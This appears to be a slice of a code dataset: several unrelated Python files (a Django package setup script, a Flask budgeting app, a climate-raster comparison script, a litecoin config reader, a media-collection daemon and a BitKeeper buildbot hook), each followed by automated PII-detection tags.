'Packets.MS'], ['URL', 'Packets.DE'], ['URL', 'Packets.DE'], ['URL', 'reactor.ca'], ['URL', 'self.tr'], ['URL', 'self.se'], ['URL', 'self.factory.co']] |
89 | #!/usr/bin/env python
import codecs
from setuptools import setup, find_packages
url='http://github.com/mila/django-noticebox/tree/master'
try:
long_description = codecs.open('README.rst', "r", "utf-8").read()
except IOError:
long_description = "See %s" % url
setup(
name='django-noticebox',
version=__import__("noticebox").__version__,
description='Django-noticebox is a reusable Django application which '
'provides functionality for sending notices to site users. '
'The notices can be displayed when user signs in, '
'sent by email or both.',
long_description=long_description,
author='Miloslav Pojman',
    author_email='dummy@email.com',
url=url,
packages=find_packages(),
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
include_package_data=True,
zip_safe=False,
)
| 1,086 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', "http://github.com/mila/django-noticebox/tree/master'"], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'README.rs'], ['URL', 'email.com']] |
90 | from flask import Flask, render_template, request, redirect
from sql import select
# Create Flask app
app = Flask(__name__)
# API Blueprint
from api import api
app.register_blueprint(api, url_prefix="/api")
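# every route defined on the api blueprint is served under the /api prefix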
# Load Index page
@app.route("/")
def index():
return render_template("index.html")
# --------------- BILLS --------------- #
# Bills page
@app.route("/bills")
def bills():
bills = select("bills")
return render_template("bills.html", bills=bills)
# Add Bill page
@app.route("/bills/add")
def bills_add():
return render_template("bills_add.html")
# Edit Bill page
@app.route("/bills/edit")
def bills_edit():
return render_template("bills_edit.html")
# --------------- SPENDING --------------- #
# Spending page
@app.route("/spending")
def spending():
spending = select("spending")
return render_template("spending.html", spending=spending)
# Add Spending page
@app.route("/spending/add")
def spending_add():
accounts = select("accounts")
return render_template("spending_add.html", accounts=accounts)
# Edit Spending page
@app.route("/spending/edit")
def spending_edit():
return render_template("spending_edit.html")
# --------------- ACCOUNTS --------------- #
# Accounts page
@app.route("/accounts")
def accounts():
accounts = select("accounts")
return render_template("accounts.html", accounts=accounts)
# Add Account page
@app.route("/accounts/add")
def accounts_add():
return render_template("accounts_add.html")
# Edit Account page
@app.route("/accounts/edit")
def accounts_edit():
return render_template("accounts_edit.html")
# Run Flask app on load
if __name__ == "__main__":
app.run(debug=True, host="127.0.0.1")
| 1,785 | [['LOCATION', 'app.register_blueprint(api'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.re'], ['URL', 'app.ro'], ['URL', 'index.ht'], ['URL', 'app.ro'], ['URL', 'bills.ht'], ['URL', 'app.ro'], ['URL', 'add.ht'], ['URL', 'app.ro'], ['URL', 'edit.ht'], ['URL', 'app.ro'], ['URL', 'spending.ht'], ['URL', 'app.ro'], ['URL', 'add.ht'], ['URL', 'app.ro'], ['URL', 'edit.ht'], ['URL', 'app.ro'], ['URL', 'accounts.ht'], ['URL', 'app.ro'], ['URL', 'add.ht'], ['URL', 'app.ro'], ['URL', 'edit.ht'], ['URL', 'app.ru']] |
91 | # # # # # compare tasmin, tas, tasmax in a timeseries of GeoTiff files # # # #
def transform_from_latlon( lat, lon ):
''' simple way to make an affine transform from lats and lons coords '''
from affine import Affine
lat = np.asarray( lat )
lon = np.asarray(lon)
trans = Affine.translation(lon[0], lat[0])
scale = Affine.scale(lon[1] - lon[0], lat[1] - lat[0])
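    # the composed transform maps array indices (col, row) to (lon, lat);
    # note this assumes the 1-D coordinate arrays are evenly spaced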
return trans * scale
def rasterize( shapes, coords, latitude='latitude', longitude='longitude', fill=None, **kwargs ):
'''
Rasterize a list of (geometry, fill_value) tuples onto the given
xarray coordinates. This only works for 1d latitude and longitude
arrays.
'''
from rasterio import features
if fill == None:
fill = np.nan
transform = transform_from_latlon( coords[ latitude ], coords[ longitude ] )
out_shape = ( len( coords[ latitude ] ), len( coords[ longitude ] ) )
raster = features.rasterize(shapes, out_shape=out_shape,
fill=fill, transform=transform,
dtype=float, **kwargs)
spatial_coords = {latitude: coords[latitude], longitude: coords[longitude]}
return xr.DataArray(raster, coords=spatial_coords, dims=(latitude, longitude))
def sort_files( files, split_on='_', elem_month=-2, elem_year=-1 ):
'''
sort a list of files properly using the month and year parsed
from the filename. This is useful with SNAP data since the standard
is to name files like '<prefix>_MM_YYYY.tif'. If sorted using base
Pythons sort/sorted functions, things will be sorted by the first char
of the month, which makes thing go 1, 11, ... which sucks for timeseries
this sorts it properly following SNAP standards as the default settings.
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-2. For SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sorted `list` by month and year ascending.
'''
import pandas as pd
months = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ]
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( {'fn':files, 'month':months, 'year':years} )
df_sorted = df.sort_values( ['year', 'month' ] )
return df_sorted.fn.tolist()
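# Illustration with hypothetical names: ['tas_11_1901.tif', 'tas_2_1901.tif']
# sorts to ['tas_2_1901.tif', 'tas_11_1901.tif'] -- numeric (year, month)
# order rather than the lexicographic order plain sorted() would give.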
def only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ):
'''
return new list of filenames where they are truncated to begin:end
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
begin = [int] four digit integer year of the begin time default:1901
end = [int] four digit integer year of the end time default:2100
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sliced `list` to begin and end year.
'''
import pandas as pd
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( { 'fn':files, 'year':years } )
df_slice = df[ (df.year >= begin ) & (df.year <= end ) ]
return df_slice.fn.tolist()
def masked_mean( fn, bounds=None ):
    ''' get the mean of the full domain (the data are already clipped);
    mostly used for processing lots of files in parallel. '''
import numpy as np
import rasterio
with rasterio.open( fn ) as rst:
if bounds:
window = rst.window( *bounds )
else:
window = rst.window( *rst.bounds )
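        # rst.bounds is a BoundingBox(left, bottom, right, top), so *rst.bounds
        # selects the dataset's full extent as the window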
mask = (rst.read_masks( 1 ) == 0)
arr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask )
return np.mean( arr )
if __name__ == '__main__':
import os, glob
import geopandas as gpd
import numpy as np
import xarray as xr
import matplotlib
matplotlib.use( 'agg' )
from matplotlib import pyplot as plt
from pathos.mp_map import mp_map
import pandas as pd
import geopandas as gpd
# args / set working dir
base_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data'
os.chdir( base_dir )
# scenarios = ['rcp60', 'rcp85']
scenarios = ['historical']
shp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp'
shp = gpd.read_file( shp_fn )
bounds = shp.bounds
# models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
# models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
models = ['ts323']
variables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#,
# models = ['CRU_TS323']
# begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]]
begin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]]
for scenario in scenarios:
for variables in variables_list:
for m in models:
for begin, end in begin_end_groups: # not fully wired-up yet
if m == 'ts323':
old_dir = 'PI:KEY'
# begin = 1950
# end = 1965
else:
if scenario == 'historical':
old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models'
# begin = 1950
# end = 1965
else:
old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models'
# begin = 2095
# end = 2100
figsize = (16,9)
out = {}
for v in variables:
path = os.path.join( base_dir,'downscaled', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v ] = mp_map( masked_mean, files, nproc=4 )
if v == 'tas' or v == 'pr':
if m == 'ts323':
path = os.path.join( old_dir, v )
print( path )
else:
path = os.path.join( old_dir, scenario, m, v )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 )
# nofix
path = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 )
plot_df = pd.DataFrame( out )
plot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' )
# sort the columns for output plotting cleanliness:
if 'tas' in variables:
col_list = ['tasmax', 'tas_old', 'tas', 'tasmin']
elif 'pr' in variables:
col_list = ['pr', 'pr_old', 'pr_nofix']
plot_df = plot_df[ col_list ] # get em in the order for plotting
if v == 'pr':
plot_df = plot_df.round()[['pr','pr_old']]
# now plot the dataframe
if begin == end:
title = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin )
else:
title = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end )
if 'tas' in variables:
colors = ['red', 'black', 'blue', 'red' ]
else:
colors = [ 'blue', 'black', 'darkred' ]
ax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors )
output_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' )
if not os.path.exists( output_dir ):
os.makedirs( output_dir )
# now plot the dataframe
out_metric_fn = 'temps'
if 'pr' in variables:
out_metric_fn = 'prec'
if begin == end:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) )
else:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) )
plt.savefig( output_filename, dpi=400 )
plt.close()
# # # PRISM TEST VERSION DIFFERENCES # # # # # # #
# import rasterio
# import numpy as np
# import os, glob, itertools
# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism'
# variables = [ 'tmax', 'tmin' ]
# for variable in variables:
# ak_olds = sorted( glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) )
# ak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) )
# olds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ])
# news = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ])
# out = olds - news
# out[ (olds == -9999.0) | (news == -9999.0) ] = 0
# uniques = np.unique( out )
# uniques[ uniques > 0.01 ]
| 9,041 | [['PERSON', 'tasmax'], ['NRP', 'GeoTiff'], ['PERSON', 'lons'], ['PERSON', 'Rasterize'], ['LOCATION', 'split_on='], ['DATE_TIME', 'the month and year'], ['DATE_TIME', 'the month'], ['DATE_TIME', '11'], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'year'], ['DATE_TIME', "'year'"], ['DATE_TIME', "'month'"], ['LOCATION', 'split_on='], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'end year'], ['PERSON', 'geopandas'], ['PERSON', 'geopandas'], ['PERSON', 'os.chdir'], ['DATE_TIME', '1916'], ['DATE_TIME', '2000'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'glob'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'Affine.tr'], ['URL', 'Affine.sc'], ['URL', 'np.na'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'os.path.ba'], ['URL', 'df.so'], ['URL', 'sorted.fn.to'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'df.ye'], ['URL', 'df.ye'], ['URL', 'slice.fn.to'], ['URL', 'rst.bo'], ['URL', 'rst.re'], ['URL', 'np.ma.ma'], ['URL', 'rst.re'], ['URL', 'np.me'], ['URL', 'matplotlib.us'], ['URL', 'pathos.mp'], ['URL', 'os.ch'], ['URL', 'StudyArea.sh'], ['URL', 'gpd.re'], ['URL', 'shp.bo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'df.in'], ['URL', 'df.ro'], ['URL', 'df.pl'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'plt.sa'], ['URL', 'plt.cl'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'np.ar'], ['URL', 'np.ar']] |
92 | # Copyright (c) 2010 Witchspace dummy@email.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
Utilities for reading litecoin configuration files.
"""
def read_config_file(filename):
"""
Read a simple ``'='``-delimited config file.
Raises :const:`IOError` if unable to open file, or :const:`ValueError`
    if a parse error occurs.
"""
f = open(filename)
try:
cfg = {}
for line in f:
line = line.strip()
if line and not line.startswith("#"):
try:
(key, value) = line.split('=', 1)
cfg[key] = value
except ValueError:
pass # Happens when line has no '=', ignore
finally:
f.close()
return cfg
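# Illustration (hypothetical values): a file containing the two lines
#   rpcuser=alice
#   rpcpassword=secret
# yields {'rpcuser': 'alice', 'rpcpassword': 'secret'}; lines without '=' are ignored.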
def read_default_config(filename=None):
"""
Read litecoin default configuration from the current user's home directory.
Arguments:
- `filename`: Path to a configuration file in a non-standard location (optional)
"""
if filename is None:
import os
import platform
home = os.getenv("HOME")
if not home:
raise IOError("Home directory not defined, don't know where to look for config file")
if platform.system() == "Darwin":
location = 'Library/Application Support/Litecoin/litecoin.conf'
else:
location = '.litecoin/litecoin.conf'
filename = os.path.join(home, location)
elif filename.startswith("~"):
import os
filename = os.path.expanduser(filename)
try:
return read_config_file(filename)
except (IOError, ValueError):
pass # Cannot read config file, ignore
| 2,706 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['LOCATION', 'Witchspace'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'os.ge'], ['URL', 'platform.sy'], ['URL', 'litecoin.co'], ['URL', 'litecoin.co'], ['URL', 'os.path.jo'], ['URL', 'filename.st'], ['URL', 'os.pa']] |
93 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Smewt - A smart collection manager
# Copyright (c) 2010 Nicolas Wack dummy@email.com
#
# Smewt is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Smewt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from pygoo import MemoryObjectGraph, Equal, ontology
from guessit.slogging import setupLogging
from smewt import config
from smewt.ontology import Episode, Movie, Subtitle, Media, Config
from smewt.base import cache, utils, Collection
from smewt.base.taskmanager import TaskManager, FuncTask
from smewt.taggers import EpisodeTagger, MovieTagger
from smewt.plugins.feedwatcher import FeedWatcher
from threading import Timer
import smewt
import time
import os
import logging
log = logging.getLogger(__name__)
class VersionedMediaGraph(MemoryObjectGraph):
def __init__(self, *args, **kwargs):
super(VersionedMediaGraph, self).__init__(*args, **kwargs)
def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()):
result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps)
if isinstance(result, Media):
result.lastModified = time.time()
return result
def clear_keep_config(self):
# we want to keep our config object untouched
tmp = MemoryObjectGraph()
tmp.add_object(self.config)
super(VersionedMediaGraph, self).clear()
self.add_object(tmp.find_one(Config))
def __getattr__(self, name):
# if attr is not found and starts with an upper case letter, it might be the name
# of one of the registered classes. In that case, return a function that would instantiate
# such an object in this graph
if name[0].isupper() and name in ontology.class_names():
def inst(basenode = None, **kwargs):
result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs)
if isinstance(result, Media):
result.lastModified = time.time()
return result
return inst
raise AttributeError, name
@property
def config(self):
try:
return self.find_one(Config)
except ValueError:
return self.Config()
class SmewtDaemon(object):
def __init__(self):
super(SmewtDaemon, self).__init__()
# Note: put log file in data dir instead of log dir so that it is
# accessible through the user/ folder static view
self.logfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.log')
setupLogging(filename=self.logfile, with_time=True, with_thread=True)
if smewt.config.PERSISTENT_CACHE:
self.loadCache()
# get a TaskManager for all the import tasks
self.taskManager = TaskManager()
# get our main graph DB
self.loadDB()
# get our collections: series and movies for now
self.episodeCollection = Collection(name = 'Series',
# import episodes and their subtitles too
validFiles = [ Episode.isValidEpisode,
Subtitle.isValidSubtitle ],
mediaTagger = EpisodeTagger,
dataGraph = self.database,
taskManager = self.taskManager)
self.movieCollection = Collection(name = 'Movie',
# import movies and their subtitles too
validFiles = [ Movie.isValidMovie,
Subtitle.isValidSubtitle ],
mediaTagger = MovieTagger,
dataGraph = self.database,
taskManager = self.taskManager)
if config.REGENERATE_THUMBNAILS:
# launch the regeneration of the thumbnails, but only after everything
# is setup and we are able to serve requests
Timer(3, self.regenerateSpeedDialThumbnails).start()
if self.database.config.get('tvuMldonkeyPlugin'):
# load up the feed watcher
self.feedWatcher = FeedWatcher(self)
# FIXME: this should go into a plugin.init() method
from smewt.plugins import mldonkey
mldonkey.send_command('vm')
# do not rescan as it would be too long and we might delete some files that
        # are on an inaccessible network share or an external HDD
self.taskManager.add(FuncTask('Update collections', self.updateCollections))
def quit(self):
log.info('SmewtDaemon quitting...')
self.taskManager.finishNow()
try:
self.feedWatcher.quit()
except AttributeError:
pass
self.saveDB()
if smewt.config.PERSISTENT_CACHE:
self.saveCache()
log.info('SmewtDaemon quitting OK!')
def _cacheFilename(self):
return utils.path(smewt.dirs.user_cache_dir, 'Smewt.cache',
createdir=True)
def loadCache(self):
cache.load(self._cacheFilename())
def saveCache(self):
cache.save(self._cacheFilename())
def clearCache(self):
cache.clear()
cacheFile = self._cacheFilename()
log.info('Deleting cache file: %s' % cacheFile)
try:
os.remove(cacheFile)
except OSError:
pass
def loadDB(self):
dbfile = smewt.settings.get('database_file')
if not dbfile:
dbfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.database',
createdir=True)
smewt.settings.set('database_file', dbfile)
log.info('Loading database from: %s', dbfile)
self.database = VersionedMediaGraph()
try:
self.database.load(dbfile)
except:
log.warning('Could not load database %s', dbfile)
def saveDB(self):
dbfile = smewt.settings.get('database_file')
log.info('Saving database to %s', dbfile)
self.database.save(dbfile)
def clearDB(self):
log.info('Clearing database...')
self.database.clear_keep_config()
self.database.save(smewt.settings.get('database_file'))
def updateCollections(self):
self.episodeCollection.update()
self.movieCollection.update()
def rescanCollections(self):
self.episodeCollection.rescan()
self.movieCollection.rescan()
def _regenerateSpeedDialThumbnails(self):
import shlex, subprocess
from PIL import Image
from StringIO import StringIO
webkit2png = (subprocess.call(['which', 'webkit2png'], stdout=subprocess.PIPE) == 0)
if not webkit2png:
log.warning('webkit2png not found. please run: "python setup.py install" from within the 3rdparty/webkit2png folder')
return
def gen(path, filename):
width, height = 200, 150
log.info('Creating %dx%d screenshot for %s...' % (width, height, path))
filename = utils.path(smewt.dirs.user_data_dir, 'speeddial', filename, createdir=True)
cmd = 'webkit2png -g 1000 600 "http://localhost:6543%s"' % path
screenshot, _ = subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE).communicate()
im = Image.open(StringIO(screenshot))
im.thumbnail((width, height), Image.ANTIALIAS)
im.save(filename, "PNG")
gen('/movies', 'allmovies.png')
gen('/movies/table', 'moviestable.png')
gen('/movies/recent', 'recentmovies.png')
gen('/series', 'allseries.png')
gen('/series/suggestions', 'episodesuggestions.png')
gen('/feeds', 'feeds.png')
def regenerateSpeedDialThumbnails(self):
self.taskManager.add(FuncTask('Regenerate thumbnails',
self._regenerateSpeedDialThumbnails))
| 8,704 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Nicolas Wack'], ['LOCATION', 'self).__getattr__(name)(basenode'], ['PERSON', 'Smewt.log'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = EpisodeTagger'], ['NRP', 'dataGraph'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = MovieTagger'], ['PERSON', 'self.taskManager.finishNow'], ['PERSON', 'self.saveCache'], ['PERSON', 'self.database = VersionedMediaGraph'], ['PERSON', 'utils.path(smewt.dirs.user_data_dir'], ['LOCATION', 'Image'], ['PERSON', "self.taskManager.add(FuncTask('Regenerate"], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'guessit.sl'], ['URL', 'smewt.ba'], ['URL', 'smewt.ba'], ['URL', 'smewt.pl'], ['URL', 'logging.ge'], ['URL', 'result.la'], ['URL', 'tmp.ad'], ['URL', 'self.co'], ['URL', 'self.ad'], ['URL', 'tmp.fi'], ['URL', 'ontology.cl'], ['URL', 'result.la'], ['URL', 'self.fi'], ['URL', 'self.Co'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.config.PE'], ['URL', 'Episode.is'], ['URL', 'Subtitle.is'], ['URL', 'self.mo'], ['URL', 'Movie.is'], ['URL', 'Subtitle.is'], ['URL', 'config.RE'], ['URL', 'self.re'], ['URL', 'self.database.config.ge'], ['URL', 'plugin.in'], ['URL', 'smewt.pl'], ['URL', 'mldonkey.se'], ['URL', 'self.taskManager.ad'], ['URL', 'log.in'], ['URL', 'self.taskManager.fi'], ['URL', 'self.sa'], ['URL', 'smewt.config.PE'], ['URL', 'self.sa'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'Smewt.ca'], ['URL', 'cache.sa'], ['URL', 'cache.cl'], ['URL', 'log.in'], ['URL', 'os.re'], ['URL', 'smewt.settings.ge'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.settings.se'], ['URL', 'log.in'], ['URL', 'smewt.settings.ge'], ['URL', 'log.in'], ['URL', 'self.database.sa'], ['URL', 'log.in'], ['URL', 'self.database.cl'], ['URL', 'self.database.sa'], ['URL', 'smewt.settings.ge'], ['URL', 'self.mo'], ['URL', 'self.episodeCollection.re'], ['URL', 'self.movieCollection.re'], ['URL', 'subprocess.ca'], ['URL', 'setup.py'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'im.th'], ['URL', 'Image.AN'], ['URL', 'im.sa'], ['URL', 'allmovies.pn'], ['URL', 'moviestable.pn'], ['URL', 'recentmovies.pn'], ['URL', 'allseries.pn'], ['URL', 'episodesuggestions.pn'], ['URL', 'feeds.pn'], ['URL', 'self.taskManager.ad']] |
94 | #!/usr/local/bin/python
#
# BitKeeper hook script.
#
# svn_buildbot.py was used as a base for this file; if you find any bugs or
# errors please email me.
#
# Amar Takhar dummy@email.com
'''
/path/to/bk_buildbot.py --repository "$REPOS" --revision "$REV" --branch \
"<branch>" --bbserver localhost --bbport 9989
'''
import commands
import sys
import os
import re
if sys.version_info < (2, 6):
import sets
# We have hackish "-d" handling here rather than in the Options
# subclass below because a common error will be to not have twisted in
# PYTHONPATH; we want to be able to print that error to the log if
# debug mode is on, so we set it up before the imports.
DEBUG = None
if '-d' in sys.argv:
i = sys.argv.index('-d')
DEBUG = sys.argv[i+1]
del sys.argv[i]
del sys.argv[i]
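    # two deletes on purpose: the first removes '-d' itself, the second removes
    # its argument, which shifted down into index i after the first delete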
if DEBUG:
f = open(DEBUG, 'a')
sys.stderr = f
sys.stdout = f
from twisted.internet import defer, reactor
from twisted.python import usage
from twisted.spread import pb
from twisted.cred import credentials
class Options(usage.Options):
optParameters = [
['repository', 'r', None,
"The repository that was changed."],
['revision', 'v', None,
"The revision that we want to examine (default: latest)"],
['branch', 'b', None,
"Name of the branch to insert into the branch field. (REQUIRED)"],
['category', 'c', None,
"Schedular category."],
['bbserver', 's', 'localhost',
"The hostname of the server that buildbot is running on"],
['bbport', 'p', 8007,
"The port that buildbot is listening on"]
]
optFlags = [
['dryrun', 'n', "Do not actually send changes"],
]
def __init__(self):
usage.Options.__init__(self)
def postOptions(self):
if self['repository'] is None:
raise usage.error("You must pass --repository")
class ChangeSender:
def getChanges(self, opts):
"""Generate and stash a list of Change dictionaries, ready to be sent
to the buildmaster's PBChangeSource."""
# first we extract information about the files that were changed
repo = opts['repository']
print "Repo:", repo
rev_arg = ''
if opts['revision']:
rev_arg = '-r"%s"' % (opts['revision'], )
changed = commands.getoutput("bk changes -v %s -d':GFILE:\\n' '%s'" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del changed[0]
change_info = commands.getoutput("bk changes %s -d':USER:\\n$each(:C:){(:C:)\\n}' '%s'" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del change_info[0]
who = change_info.pop(0)
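        # per the dspec above, the first line of output is the user and the
        # remaining lines are the checkin comments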
branch = opts['branch']
message = '\n'.join(change_info)
revision = opts.get('revision')
changes = {'who': who,
'branch': branch,
'files': changed,
'comments': message,
'revision': revision}
if opts.get('category'):
changes['category'] = opts.get('category')
return changes
def sendChanges(self, opts, changes):
pbcf = pb.PBClientFactory()
reactor.connectTCP(opts['bbserver'], int(opts['bbport']), pbcf)
d = pbcf.login(credentials.UsernamePassword('change', 'changepw'))
d.addCallback(self.sendAllChanges, changes)
return d
def sendAllChanges(self, remote, changes):
dl = remote.callRemote('addChange', changes)
return dl
def run(self):
opts = Options()
try:
opts.parseOptions()
if not opts['branch']:
print "You must supply a branch with -b or --branch."
                sys.exit(1)
except usage.error, ue:
print opts
print "%s: %s" % (sys.argv[0], ue)
sys.exit()
changes = self.getChanges(opts)
if opts['dryrun']:
for k in changes.keys():
print "[%10s]: %s" % (k, changes[k])
print "*NOT* sending any changes"
return
d = self.sendChanges(opts, changes)
def quit(*why):
print "quitting! because", why
reactor.stop()
def failed(f):
print "FAILURE: %s" % f
reactor.stop()
d.addErrback(failed)
d.addCallback(quit, "SUCCESS")
reactor.callLater(60, quit, "TIMEOUT")
reactor.run()
if __name__ == '__main__':
s = ChangeSender()
s.run()
